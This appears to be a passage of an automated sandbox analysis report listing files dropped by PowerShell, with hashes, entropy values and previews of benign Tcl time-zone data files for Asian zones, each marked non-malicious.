                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Nicosia) {.. {-9223372036854775808 8008 0 LMT}.. {-1518920008 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {62258760
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2063
                                                                                                                                                                                                                              Entropy (8bit):3.718004112421892
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:526enddzXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnFf:5l40yVRB7VfXucydm46I/CTxwf
                                                                                                                                                                                                                              MD5:513B6A2AF76DAED9002C037BEC99862F
                                                                                                                                                                                                                              SHA1:82D1C47BDF46B8B901C35BACACE8595C093BF5F2
                                                                                                                                                                                                                              SHA-256:96A445D47D834C28480D1E2036ECA4962B35AFA494C219065D4879F71C1830DB
                                                                                                                                                                                                                              SHA-512:2FE5AF4FA9D6AAB4FBD8E354789B82D39FA1B52394D3A0ABFBC6A30A531E0B7429A3D9AC7835A2843A6E9859E0255565F151FDFC87004ACB4EBD1AAD40BDA8A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novokuznetsk) {.. {-9223372036854775808 20928 0 LMT}.. {-1441259328 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {748983600 25200 0 +07}.. {
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2121
                                                                                                                                                                                                                              Entropy (8bit):3.714792994893581
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:52sve20ruXJfsFN/3sFrOksF/sF7IyksF7FRZsFLsFTsFcsFk73sFK/XCFKTipnF:5Hc40yVRB7VfXu0TKmtTTDOWQ
                                                                                                                                                                                                                              MD5:AC8C8D768503C8334A9FBAEF4C3A9CAB
                                                                                                                                                                                                                              SHA1:CA10BB99E2D7AB329229759BD4801068A3AEB6D5
                                                                                                                                                                                                                              SHA-256:EF799077291F6B3B19E0AEC88F224BB592FAAD09D30740F2376D3D20F2169639
                                                                                                                                                                                                                              SHA-512:34049B1AC4254F999C3E5AD8CB31ABF88AC2D972E20E19927F33CC59935354F92125A0342A413E64227E8AE29DDFC2FFE5F67AE538C89D8EBAD7FCA889321DFA
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Novosibirsk) {.. {-9223372036854775808 19900 0 LMT}.. {-1579476700 21600 0 +06}.. {-1247551200 25200 0 +08}.. {354906000 28800 1 +08}.. {370713600 25200 0 +07}.. {386442000 28800 1 +08}.. {402249600 25200 0 +07}.. {417978000 28800 1 +08}.. {433785600 25200 0 +07}.. {449600400 28800 1 +08}.. {465332400 25200 0 +07}.. {481057200 28800 1 +08}.. {496782000 25200 0 +07}.. {512506800 28800 1 +08}.. {528231600 25200 0 +07}.. {543956400 28800 1 +08}.. {559681200 25200 0 +07}.. {575406000 28800 1 +08}.. {591130800 25200 0 +07}.. {606855600 28800 1 +08}.. {622580400 25200 0 +07}.. {638305200 28800 1 +08}.. {654634800 25200 0 +07}.. {670359600 21600 0 +07}.. {670363200 25200 1 +07}.. {686088000 21600 0 +06}.. {695764800 25200 0 +08}.. {701809200 28800 1 +08}.. {717534000 25200 0 +07}.. {733258800 28800 1 +08}.. {738090000 25200 0 +07}.. {7
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2055
                                                                                                                                                                                                                              Entropy (8bit):3.6912374223526396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5abexPvO1FMnFP1FCnFHnFKqenFdDnFQgOnFxjPnFITnFonFJynFAT4TBThSv0FP:5asvjdqxph01NSvPETKmtTTDO0
                                                                                                                                                                                                                              MD5:3E06B20B0B62AA09FA03082FAEE4FD62
                                                                                                                                                                                                                              SHA1:8886EC80528ECA13D3364138BFFE92F881768169
                                                                                                                                                                                                                              SHA-256:2605CD1E26E4AB48BCB4399BB5B17BAD115A47F87BA3DD54B55BB50C3FE82606
                                                                                                                                                                                                                              SHA-512:04C1B6A898D12C8EA1B0B2F6665C870434061C63CC8F7A067BFC708E9828BA2E60104B82E2025E42D51DA2F485890C4D34EC0341EF466A7942649BE64F5EEE17
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Omsk) {.. {-9223372036854775808 17610 0 LMT}.. {-1582088010 18000 0 +05}.. {-1247547600 21600 0 +07}.. {354909600 25200 1 +07}.. {370717200 21600 0 +06}.. {386445600 25200 1 +07}.. {402253200 21600 0 +06}.. {417981600 25200 1 +07}.. {433789200 21600 0 +06}.. {449604000 25200 1 +07}.. {465336000 21600 0 +06}.. {481060800 25200 1 +07}.. {496785600 21600 0 +06}.. {512510400 25200 1 +07}.. {528235200 21600 0 +06}.. {543960000 25200 1 +07}.. {559684800 21600 0 +06}.. {575409600 25200 1 +07}.. {591134400 21600 0 +06}.. {606859200 25200 1 +07}.. {622584000 21600 0 +06}.. {638308800 25200 1 +07}.. {654638400 21600 0 +06}.. {670363200 18000 0 +06}.. {670366800 21600 1 +06}.. {686091600 18000 0 +05}.. {695768400 21600 0 +07}.. {701812800 25200 1 +07}.. {717537600 21600 0 +06}.. {733262400 25200 1 +07}.. {748987200 21600 0 +06}.. {76471200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1664
                                                                                                                                                                                                                              Entropy (8bit):3.708603813141953
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:53PvalvNhQQvmRKqv0fvzQIovWdvEGvDaDv7w9hYwr:JHaBNKs6b03zB0WJEuDa77w9hYA
                                                                                                                                                                                                                              MD5:A3BD0C15642AE4F001F98F8E060E8374
                                                                                                                                                                                                                              SHA1:366F3C7FD4000AC23B79AB0FF4429371ED323B81
                                                                                                                                                                                                                              SHA-256:933BBCD7AE0BF59A5B4A6E0EF74C237FEEDC42E6A3AEB2158131AA70FBA6FE47
                                                                                                                                                                                                                              SHA-512:16D8692D3EA96D3594E6220A6989BBFBB926A66EEBEB240C4DC68BE75C69C5206659D9D341D92AE6128928FD38A5F45B445621CBBBA4E4BA8C34C3AC52BF3C08
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Oral) {.. {-9223372036854775808 12324 0 LMT}.. {-1441164324 10800 0 +03}.. {-1247540400 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 14400 0 +04}.. {606866400 18000 1 +04}.. {622591200 14400 0 +04}.. {638316000 18000 1 +04}.. {654645600 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {701816400 14400 0 +04}.. {701820000 18000 1 +04}.. {717544800 14400 0 +04}.. {733269600 18000 1 +04}.. {74899440
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):180
                                                                                                                                                                                                                              Entropy (8bit):4.958543249401788
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8VLYO5YFfXHAIgN8ELYOJARL/2WFKeHKLNM0WFKELt:SlSWB9vsM3y1LePHAIgKELtAN/2wKTNg
                                                                                                                                                                                                                              MD5:EBF01E229CC41EB8B27650A3D668EDC1
                                                                                                                                                                                                                              SHA1:33E1B252C1B45EAE326FCF8CC7C80C78A46F7E8D
                                                                                                                                                                                                                              SHA-256:DCEE88876D00396918F43DECA421B6C9B02F84B5866A2CE16E641B814B390A9F
                                                                                                                                                                                                                              SHA-512:80840600F37A256B8FD9933760FBAE7C13DE1E24EFD970E47BE8DEC731DFABF6D6FB76999BEEC775FF8C8B8719E94788ED7EEB04376A34C827ACB443F720F7E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Bangkok)]} {.. LoadTimeZoneFile Asia/Bangkok..}..set TZData(:Asia/Phnom_Penh) $TZData(:Asia/Bangkok)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                                              Entropy (8bit):4.492596995768464
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wKT5PDm2OHUeoH99xV/1kc5k/MVSSFFCLkvScH+dMVSSFL1CnF4mMz:MB862L5bmdHFCRV/6c5kMxGLkHHaMxFn
                                                                                                                                                                                                                              MD5:9ADB1A9E41A143A06116E24EA0A53D90
                                                                                                                                                                                                                              SHA1:6E50B549E1A705C0090BD5EDE26F7DED78CDF71A
                                                                                                                                                                                                                              SHA-256:AC8370AEDF5FE3FE1E80710CE117DEE23815BE377D418E4B4F3259A1930E8DBF
                                                                                                                                                                                                                              SHA-512:92790B20B960AC518AB2E18F902C6E0BA887F268909F5571CAC1068F5E719CCF6943AE6902DA1B683E170658B5E7BE06C6A187C1C0A652DD052D5BD0B2A7B84D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pontianak) {.. {-9223372036854775808 26240 0 LMT}.. {-1946186240 26240 0 PMT}.. {-1172906240 27000 0 +0730}.. {-881220600 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 28800 0 WITA}.. {567964800 25200 0 WIB}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):273
                                                                                                                                                                                                                              Entropy (8bit):4.709411633376997
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2wK8cE4SDm2OHnNoH9Aw8vmVuT0vjLtcjviov:MB8620cExmdHnNCGv2Ezv
                                                                                                                                                                                                                              MD5:727BBC1A1662B500F616F544A484F213
                                                                                                                                                                                                                              SHA1:93C1D902D9D4AA4197C7D16C61FB784AC01D0DE5
                                                                                                                                                                                                                              SHA-256:29BA17F756F5C0BBA30FEBF44E620504D04921C832BD1CB56E1B60EF288B57DF
                                                                                                                                                                                                                              SHA-512:C3C91E2F180109FF33E6491722F679A1B8DCE8CD31DE006D7FF2CBE270C008E927507C953641D28EE77D139BBEA54DEA1B7DBD6C30B208DDAB1B58756C32AC02
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Pyongyang) {.. {-9223372036854775808 30180 0 LMT}.. {-1948782180 30600 0 KST}.. {-1830414600 32400 0 JST}.. {-768646800 32400 0 KST}.. {1439564400 30600 0 KST}.. {1525446000 32400 0 KST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):176
                                                                                                                                                                                                                              Entropy (8bit):4.851251407399968
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFKK3ovXMXGm2OHPFV4YoHsQKb3VvVsRYovFFF3FRVGsWr:SlSWB9eg/2wKK3yXDm2OHoYoHxcvSNFS
                                                                                                                                                                                                                              MD5:CBA9635133F88AD3B27E23B95430C27C
                                                                                                                                                                                                                              SHA1:5E41232EC03BBC71B522F58CB2D05E6BFFFF1A75
                                                                                                                                                                                                                              SHA-256:18CCA69F933795CE3F7DB31506EFC063E6CE1DFDCAB32AA387C398456D7F7E1F
                                                                                                                                                                                                                              SHA-512:D7C43F1F9ADA54C914ADB3CB2C9063EB7044089CFC7755ACFD08828CDEBA3C116AE2BE916ABE5D561E63699B921BC52636DD0BBC2C4304F813616D320D7DDAAF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qatar) {.. {-9223372036854775808 12368 0 LMT}.. {-1577935568 14400 0 +04}.. {76190400 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1668
                                                                                                                                                                                                                              Entropy (8bit):3.7299735983334195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5DwvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWyvNSvTqvIQvyovklvqQA:BMaBNKs6b03zB0WJEuDa7sFZiKWaN6TE
                                                                                                                                                                                                                              MD5:F5DBE4E72FA5AB0019CC98C8E21EC86E
                                                                                                                                                                                                                              SHA1:27ECB901AA07C18EA7F38235E8EFE0B1635FEFBC
                                                                                                                                                                                                                              SHA-256:4191629B874C988291E8FD13E675A3ED685D677F6541313975FC4610E47F1DCD
                                                                                                                                                                                                                              SHA-512:D5EFD4EFFFFE2E41909AEB7B67BD1FA6FAF4B8E9AC645518D5B33BD1B3C5084F59D47D4ED052E0D4B9F9989BDDBA3AECB3D1E67F5237914D24C01F9C95242396
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qostanay) {.. {-9223372036854775808 15268 0 LMT}.. {-1441167268 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {686095200 14400 0 +04}.. {695772000 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {7489
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1670
                                                                                                                                                                                                                              Entropy (8bit):3.734572151642808
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5NvalvNhQQvmRKqv0fvzQIovWdvEGvDaDvs5vZlovKWgvNSvTqvIQvyovklvqQX0:TaBNKs6b03zB0WJEuDa7sFZiKWcN6Tir
                                                                                                                                                                                                                              MD5:026EC6E479EC006C4398288362254680
                                                                                                                                                                                                                              SHA1:24AD03DD21DA394B3423D27211955BFD694F8E73
                                                                                                                                                                                                                              SHA-256:CD6B067AA3EF6935B4E89CA36E6A03FCB97F1E0EE61A7B5D46C06BF4DE140774
                                                                                                                                                                                                                              SHA-512:023AC55E118F13A31CE996C7BA155C90D47DEB6C223EEB3C0EE7B702871FF0CCA13CDF61D65FDDABE41B888CD7A74274AA5730059CC5688F8ED4DDBF8FE4ECA4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Qyzylorda) {.. {-9223372036854775808 15712 0 LMT}.. {-1441167712 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 14400 0 +04}.. {670370400 18000 1 +04}.. {701812800 18000 0 +05}.. {701816400 21600 1 +05}.. {717541200 18000 0 +05}.. {733266000 21600 1 +05}.. {748990800 18000 0 +05}.. {764
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):174
                                                                                                                                                                                                                              Entropy (8bit):4.812955128020714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8nv3vXHAIgNnDA6RL/2WFK02KQMFfh4WFKsyn:SlSWB9vsM3yHvPHAIg15N/2wK0GEJ4wy
                                                                                                                                                                                                                              MD5:BD3F294F1EDDD21467E980C9F5A0E7DE
                                                                                                                                                                                                                              SHA1:11A3FC3E4489C18BDF9BFFB4C44615559D9DD99D
                                                                                                                                                                                                                              SHA-256:E4D2C38D8E7377A528291A88129CDAC40CA4D40A5F1CD8ADB98228527556906E
                                                                                                                                                                                                                              SHA-512:FA5FD600627793EABB83C1066BE246A47BCCE1FC57830596B9C0CDE8901B949AF178ABDE876C3B73CC3751312E8A4C03C390888B0B5A9669F511344143F83073
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Yangon)]} {.. LoadTimeZoneFile Asia/Yangon..}..set TZData(:Asia/Rangoon) $TZData(:Asia/Yangon)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):148
                                                                                                                                                                                                                              Entropy (8bit):4.973311159904374
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2WFK814PMXGm2OHFukeoHqUi9VssWYcv:SlSWB9eg/2wK81GDm2OHF7eoHvi9V1Wr
                                                                                                                                                                                                                              MD5:AD3236CFF141732831732357AB181EE3
                                                                                                                                                                                                                              SHA1:EAF51A63898A2048EA5FBE9BA4C001EEE37FFDB2
                                                                                                                                                                                                                              SHA-256:411E31D09FFA48E44169C42661AE2F7FC142460BCAA216837D8C4740983CA7BD
                                                                                                                                                                                                                              SHA-512:6CA2D89C02568580786BE98A863453ADCF4D21CAC52E5B44C4F7A05E76D29AEB3E28E353D6FB758BB553DBC8F35389462B388F61E94C68F5DB50A3E8C429336D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Riyadh) {.. {-9223372036854775808 11212 0 LMT}.. {-719636812 10800 0 +03}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.946090704619887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8I65eV5XHAIgN2h6560ARL/2WFKwJ6h4WFK365ey:SlSWB9vsM3yJAVJHAIgA4k0AN/2wKl4i
                                                                                                                                                                                                                              MD5:0766480A295525EE5D65F1ED32094858
                                                                                                                                                                                                                              SHA1:7A2D68E1009DDD809A4A700931456C617DCD343A
                                                                                                                                                                                                                              SHA-256:C695981A0DF691C3F4509999FBC52858ADC75024CCCBDEFBE1094FED17E809E4
                                                                                                                                                                                                                              SHA-512:A21536FB61A64E953E8D6414FF0AEF1BC7E68A33C5DCF7090517A91FC449B96A93A4FBDF2C00682540D1193FDB29603349F5BDB455FD90045FDBCA61247A9860
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Ho_Chi_Minh)]} {.. LoadTimeZoneFile Asia/Ho_Chi_Minh..}..set TZData(:Asia/Saigon) $TZData(:Asia/Ho_Chi_Minh)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2117
                                                                                                                                                                                                                              Entropy (8bit):3.7276904131666577
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5q+3Vv+0j6lua2Gg/3gO8UoflcXRDhUBAc+:YxIa2GOT8tiXBC6c+
                                                                                                                                                                                                                              MD5:295D51B8FBBE890C97637687B8F32322
                                                                                                                                                                                                                              SHA1:7BB72B0EC783898DDF625D275E3BBB964D1693FB
                                                                                                                                                                                                                              SHA-256:D7D0EA5CEF908442AB0D777A4B097BED18540CD5280FF63F33DD989E27E72908
                                                                                                                                                                                                                              SHA-512:9B3E3BA01EAE38A00B0EE8A8FB17191CB4ED2EE9E46AE06403BA8C1193804764C86599840DC03E0C6A631456E1BE2BC560BDF6CF0450068EF78A6E494041326C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Sakhalin) {.. {-9223372036854775808 34248 0 LMT}.. {-2031039048 32400 0 +09}.. {-768560400 39600 0 +12}.. {354891600 43200 1 +12}.. {370699200 39600 0 +11}.. {386427600 43200 1 +12}.. {402235200 39600 0 +11}.. {417963600 43200 1 +12}.. {433771200 39600 0 +11}.. {449586000 43200 1 +12}.. {465318000 39600 0 +11}.. {481042800 43200 1 +12}.. {496767600 39600 0 +11}.. {512492400 43200 1 +12}.. {528217200 39600 0 +11}.. {543942000 43200 1 +12}.. {559666800 39600 0 +11}.. {575391600 43200 1 +12}.. {591116400 39600 0 +11}.. {606841200 43200 1 +12}.. {622566000 39600 0 +11}.. {638290800 43200 1 +12}.. {654620400 39600 0 +11}.. {670345200 36000 0 +11}.. {670348800 39600 1 +11}.. {686073600 36000 0 +10}.. {695750400 39600 0 +12}.. {701794800 43200 1 +12}.. {717519600 39600 0 +11}.. {733244400 43200 1 +12}.. {748969200 39600 0 +11}.. {76469
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):879
                                                                                                                                                                                                                              Entropy (8bit):3.9460497720710506
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5t8eZd7QvalvNhQQvmRKqvzQfv7PQIovWxrvEGvDWdDvs5v/RlovKT10Sv6r:5MvalvNhQQvmRKqv0fvzQIovWdvEGvDO
                                                                                                                                                                                                                              MD5:10A758996B0DF756E520541BEA9B7D75
                                                                                                                                                                                                                              SHA1:137E5FD4E00CFA4B3939EF11868862B7F93D87CD
                                                                                                                                                                                                                              SHA-256:35E4B905723891281D9A6A0A1FD3760A3A48136E1419C686BE31ACE83BF7AA9D
                                                                                                                                                                                                                              SHA-512:7E32661731EAB2ED8C387533ACCB4853F5B6225BAC11E93247E7B06D7AA856E6A665F63718BFE395CFD00F80A4C16789D7097FFA8DAD88B1D707BF9C155C1D4C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Samarkand) {.. {-9223372036854775808 16073 0 LMT}.. {-1441168073 14400 0 +04}.. {-1247544000 18000 0 +05}.. {354913200 21600 1 +06}.. {370720800 21600 0 +06}.. {386445600 18000 0 +05}.. {386449200 21600 1 +05}.. {402256800 18000 0 +05}.. {417985200 21600 1 +05}.. {433792800 18000 0 +05}.. {449607600 21600 1 +05}.. {465339600 18000 0 +05}.. {481064400 21600 1 +05}.. {496789200 18000 0 +05}.. {512514000 21600 1 +05}.. {528238800 18000 0 +05}.. {543963600 21600 1 +05}.. {559688400 18000 0 +05}.. {575413200 21600 1 +05}.. {591138000 18000 0 +05}.. {606862800 21600 1 +05}.. {622587600 18000 0 +05}.. {638312400 21600 1 +05}.. {654642000 18000 0 +05}.. {670366800 21600 1 +05}.. {686091600 18000 0 +05}.. {694206000 18000 0 +05}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):985
                                                                                                                                                                                                                              Entropy (8bit):4.121802167517286
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5AemgvHzF+zg2c+z3NGmJhIUfqII8yHg/zoD:5F/nfWUBISHg/G
                                                                                                                                                                                                                              MD5:A1DE6975DEA70D7241B5B3C43E1EA3AA
                                                                                                                                                                                                                              SHA1:35EE563A2BCA77C761F7E878997763EA8D258040
                                                                                                                                                                                                                              SHA-256:C4F82C94650572FE4D03BC1FE54CED8F4BF55DFBEE855D52DE3EA6378240AF93
                                                                                                                                                                                                                              SHA-512:1639B0609115DBEA6A381986A732A5CA1523952AEF84843B4D714D5B2FF40B16C4166D8D60D31D4FC2C2BA34DED1F6DB39474336195603562265BDBF71687696
                                                                                                                                                                                                                              Malicious:false
